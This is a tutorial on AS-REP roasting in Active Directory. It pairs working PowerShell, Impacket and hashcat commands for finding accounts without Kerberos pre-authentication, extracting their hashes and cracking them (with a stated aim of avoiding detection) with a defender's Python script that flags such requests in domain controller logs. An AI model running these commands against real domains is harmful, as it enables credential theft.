AS-REP Roasting in Depth
Enumerate accounts with Kerberos pre-authentication disabled, extract their AS-REP hashes, and crack them efficiently.
Objectives
- Identify accounts with pre-authentication disabled
- Extract AS-REP hashes using multiple tools
- Optimize cracking and detection avoidance
Discovery
# PowerShell: userAccountControl bit 4194304 (0x400000) is DONT_REQ_PREAUTH
Get-ADUser -Filter * -Properties userAccountControl | Where-Object { $_.userAccountControl -band 4194304 } | Select-Object SamAccountName
# Impacket
GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -usersfile users.txt
Extraction & Cracking
# Impacket extraction
GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -format hashcat -outputfile asrep.hashes
# Hashcat cracking
hashcat -m 18200 asrep.hashes rockyou.txt -O --session asrep
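The defender's view of the requests above, as an added example that is not part of the original page: each AS-REP issued for a pre-auth-disabled account is logged on the domain controller as Security event 4768 with Pre-Authentication Type 0, and ticket encryption type 0x17 (RC4) is the etype hashcat mode 18200 handles. The JSON-lines export layout, account names, addresses and the threshold are assumptions constructed for illustration.

```python
import json
from collections import defaultdict

# Constructed sample: Security events reduced to the EventData fields used
# here and exported one JSON object per line (the export format is assumed).
SAMPLE_EVENTS = """\
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:192.168.10.21", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2"}
{"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:192.168.10.50", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:192.168.10.50", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:192.168.10.22", "Status": "0x6", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-"}
{"EventID": 4769, "TargetUserName": "alice", "IpAddress": "::ffff:192.168.10.21", "Status": "0x0", "TicketEncryptionType": "0x12"}
"""

RC4_HMAC = 0x17  # etype 23, the AS-REP type hashcat mode 18200 handles


def find_no_preauth_tgts(lines):
    """Return successful 4768 events where the TGT was issued without pre-auth."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        # Keep only successful TGT requests (4768, Status 0x0).
        if ev.get("EventID") != 4768 or int(ev["Status"], 16) != 0:
            continue
        if ev.get("PreAuthType") != "0":
            continue
        hits.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"].replace("::ffff:", ""),
            "rc4": int(ev["TicketEncryptionType"], 16) == RC4_HMAC,
        })
    return hits


def sources_hitting_many(hits, threshold=2):
    """Map each source address to its accounts when it touched >= threshold."""
    by_src = defaultdict(set)
    for h in hits:
        by_src[h["source"]].add(h["user"])
    return {s: sorted(u) for s, u in by_src.items() if len(u) >= threshold}


if __name__ == "__main__":
    hits = find_no_preauth_tgts(SAMPLE_EVENTS)
    print(hits)
    print(sources_hitting_many(hits))
```

Every account this reports is one the PowerShell query in Discovery would also list; re-enabling pre-authentication on those accounts removes the exposure.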